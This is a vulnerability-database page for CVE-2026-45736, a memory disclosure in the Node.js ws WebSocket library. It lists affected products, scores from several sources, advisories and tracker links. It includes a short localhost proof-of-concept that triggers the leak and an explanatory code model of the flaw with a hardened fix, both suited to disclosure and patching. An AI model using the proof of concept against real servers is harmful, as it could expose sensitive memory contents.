CVE-2026-45736
Published 2026-05-15
Priority P3 · 43 · high · 7.5 · CVSS 3.1
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS: 0.72% (49.2th percentile)
ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.
Affected
71 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ansible-automation-platform-24 | lightspeed-rhel8 | — | — |
| ansible-automation-platform-25 | lightspeed-rhel8 | — | — |
| ansible-automation-platform-26 | gateway-rhel9 | — | — |
| ansible-automation-platform-26 | lightspeed-rhel9 | — | — |
| ansible-automation-platform-27 | gateway-rhel9 | — | — |
| ansible-automation-platform-27 | lightspeed-rhel9 | — | — |
| ansible-automation-platform | automation-portal | — | — |
| ansible-automation-platform | bootc-automation-portal-rhel9 | — | — |
| apache | thrift | — | — |
| clusterlabs | pcs | — | — |
| container-native-virtualization | kubevirt-console-plugin | — | — |
| container-native-virtualization | kubevirt-console-plugin-rhel9 | — | — |
| cryostat | cryostat-openshift-console-plugin-rhel9 | — | — |
| debian | ceph | — | — |
| discovery | discovery-ui-rhel9 | — | — |
| gatekeeper | gatekeeper-rhel9 | — | — |
| grafana | grafana | — | — |
| mozilla | thunderbird | — | — |
| odf4 | mcg-core-rhel9 | — | — |
| odf4 | ocs-client-console-rhel9 | — | — |
| odf4 | odf-console-rhel9 | — | — |
| odf4 | odf-multicluster-console-rhel9 | — | — |
| openshift-lightspeed | lightspeed-console-plugin-419-rhel9 | — | — |
| openshift-lightspeed | lightspeed-console-plugin-pf5-rhel9 | — | — |
| openshift-lightspeed | lightspeed-console-plugin-rhel9 | — | — |
CVSS provenance
nvd · v3.1 · 7.5 HIGH · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
ghsa · 4.4 MEDIUM
vendor_redhat · 7.5 HIGH
GHSA
ws: Uninitialized memory disclosure
ghsa·2026-05-18·CVSS 4.4
CVE-2026-45736 [MEDIUM] CWE-908 ws: Uninitialized memory disclosure
### Impact
The `websocket.close()` implementation is vulnerable to uninitialized memory disclosure when a `TypedArray` is passed as the reason argument.
### Proof of concept
```js
import { deepStrictEqual } from 'node:assert';
import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer(
  { port: 0, skipUTF8Validation: true },
  function () {
    const { port } = wss.address();
    const ws = new WebSocket(`ws://localhost:${port}`, {
      skipUTF8Validation: true
    });

    ws.on('close', function (code, reason) {
      // 20 float32 zeros are 80 zero bytes; anything else in the
      // received reason did not come from the caller's data.
      deepStrictEqual(reason, Buffer.alloc(80));
    });
  }
);

wss.on('connection', function (ws) {
  // The server closes with a TypedArray as the reason argument.
  ws.close(1000, new Float32Array(20));
});
```
### Patches
The vulnerability was fixed in ws@8.20.1 (https://github.com/websockets/ws/commit/c0327ec15
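The length mismatch behind this class of bug, as an added example that is not code from ws or from the advisory. It assumes the flaw follows the common pattern of sizing a buffer by byte length and filling it with a per-element copy, and it uses a constructed `0xAA` fill in place of `Buffer.allocUnsafe()` so the leftover bytes are visible and deterministic; all function names are hypothetical.

```javascript
// Added illustration: a model of the defect class, NOT the ws source code.
const MAX_REASON_BYTES = 123; // 125-byte control-frame payload minus 2-byte status code
const STALE = 0xaa;           // constructed marker standing in for leftover heap bytes

// Deterministic stand-in for Buffer.allocUnsafe(): memory that still holds old data.
function staleBuffer(size) {
  return Buffer.alloc(size, STALE);
}

// Flawed pattern (assumed): size measured in bytes, copy performed per element.
function buildClosePayloadFlawed(code, reason) {
  const length = Buffer.byteLength(reason); // Float32Array(20) -> 80
  const buf = staleBuffer(2 + length);
  buf.writeUInt16BE(code, 0);
  if (typeof reason === 'string') {
    buf.write(reason, 2);
  } else {
    buf.set(reason, 2); // writes reason.length elements, one byte each -> 20
  }
  return buf;
}

// Hardened step 1: reduce every accepted input to its raw bytes.
function toReasonBytes(reason) {
  let bytes;
  if (reason === undefined) {
    bytes = Buffer.alloc(0);
  } else if (typeof reason === 'string') {
    bytes = Buffer.from(reason, 'utf8');
  } else if (ArrayBuffer.isView(reason)) {
    // View over the same memory, honouring byteOffset for subarray views.
    bytes = Buffer.from(reason.buffer, reason.byteOffset, reason.byteLength);
  } else {
    throw new TypeError('reason must be a string or an ArrayBuffer view');
  }
  if (bytes.length > MAX_REASON_BYTES) {
    throw new RangeError(`reason must not exceed ${MAX_REASON_BYTES} bytes`);
  }
  return bytes;
}

// Hardened step 2: zero-filled allocation and a byte-for-byte copy.
function buildClosePayloadHardened(code, reason) {
  const bytes = toReasonBytes(reason);
  const buf = Buffer.alloc(2 + bytes.length);
  buf.writeUInt16BE(code, 0);
  bytes.copy(buf, 2);
  return buf;
}

// Counts marker bytes left in the reason part of a payload.
// Only meaningful when the reason itself contains no 0xAA bytes.
function countStaleBytes(payload) {
  let n = 0;
  for (const b of payload.subarray(2)) {
    if (b === STALE) n++;
  }
  return n;
}

// Same input as the advisory's proof of concept: 20 float32 zeros.
function demo() {
  const reason = new Float32Array(20);
  return {
    flawed: countStaleBytes(buildClosePayloadFlawed(1000, reason)),
    hardened: countStaleBytes(buildClosePayloadHardened(1000, reason))
  };
}

console.log(demo());
```

For `Uint8Array` and `Buffer` inputs the element count equals the byte length, so the modelled mismatch only appears with multi-byte element types.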
VulDB
websockets ws up to 8.20.0 websocket.close Reason uninitialized resource (GHSA-58qx-3vcg-4xpx)
vuldb·2026-05-15·CVSS 4.4
CVE-2026-45736 [MEDIUM] websockets ws up to 8.20.0 websocket.close Reason uninitialized resource (GHSA-58qx-3vcg-4xpx)
A vulnerability marked as problematic has been reported in websockets ws up to 8.20.0. This affects the function websocket.close. Performing a manipulation of the argument Reason results in uninitialized resource.
This vulnerability is cataloged as CVE-2026-45736. It is possible to initiate the attack remotely. There is no exploit available.
It is suggested to upgrade the affected component.
Red Hat
ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`
vendor_redhat·2026-05-15·CVSS 7.5
CVE-2026-45736 [HIGH] CWE-824 ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`
A flaw was found in ws, an open source WebSocket client and server for Node.js. The `websocket.close()` implementation is vulnerable to uninitialized memory disclosure when a `TypedArray` is passed as the reason argument. This can lead to the disclosure of sensitive information from uninitialized memory.
Package: cryostat/cryostat-openshift-console-plugin-rhel9 (Cryostat 4) - Affected
Package: cryostat-openshift-console-plugin-npm (Cryostat 4) - Affected
No detection rules found.
No public exploits indexed.
Bugzilla
Community trackers, each titled "CVE-2026-45736 <component>: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [<branch>]" (bugzilla · CVSS 7.5 HIGH):
| Component | Branch | Date |
|---|---|---|
| python-jupytext | fedora-all | 2026-06-23 |
| yarnpkg | fedora-all | 2026-06-23 |
| python-ipyparallel | fedora-all | 2026-06-23 |
| seamonkey | fedora-all | 2026-06-23 |
| thrift | fedora-all | 2026-06-23 |
| python-jupyterlab_pygments | fedora-all | 2026-06-23 |
| dotnet9.0 | fedora-all | 2026-06-23 |
| qt5-qtwebengine | fedora-all | 2026-06-23 |
| python-jupyterlab_pygments | epel-all | 2026-06-22 |
| jupyterlab | fedora-all | 2026-06-19 |
| golang-github-apache-beam-2 | fedora-all | 2026-06-19 |
| openbao | fedora-all | 2026-06-19 |
| rust | fedora-all | 2026-06-19 |
| magicmirror | epel-all | 2026-06-19 |
| fbthrift | epel-all | 2026-06-19 |
| onnxruntime | fedora-all | 2026-06-19 |
| seamonkey | epel-all | 2026-06-19 |
| cachelib | fedora-all | 2026-06-19 |
| thrift | epel-all | 2026-06-19 |
| pcs | fedora-all | 2026-06-19 |
| fcitx5 | fedora-all | 2026-06-19 |
| magicmirror | fedora-all | 2026-06-19 |
| python-ipyparallel | epel-all | 2026-06-19 |
| jupyterlab | epel-all | 2026-06-19 |
| nodejs-aw-webui | fedora-all | 2026-06-19 |
| forgejo | fedora-all | 2026-06-19 |
| magicmirror-module-onthisday | fedora-all | 2026-06-19 |
| yarnpkg | epel-all | 2026-06-19 |
| mozjs78 | epel-all | 2026-06-19 |
| dotnet8.0 | fedora-all | 2026-06-19 |
| h3 | fedora-all | 2026-06-19 |
| cachelib | epel-all | 2026-06-19 |
| qt6-qtwebengine | epel-all | 2026-06-19 |
| openbao | epel-all | 2026-06-19 |
| fbthrift | fedora-all | 2026-06-19 |
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`
bugzilla·2026-05-15·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`
https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086
https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx
https://access.redhat.com/errata/RHSA-2026:26638
https://access.redhat.com/errata/RHSA-2026:26994
https://access.redhat.com/errata/RHSA-2026:27171
https://access.redhat.com/errata/RHSA-2026:29197
https://access.redhat.com/errata/RHSA-2026:7655
https://access.redhat.com/security/cve/CVE-2026-45736
https://bugzilla.redhat.com/show_bug.cgi?id=2477914
https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-45736.json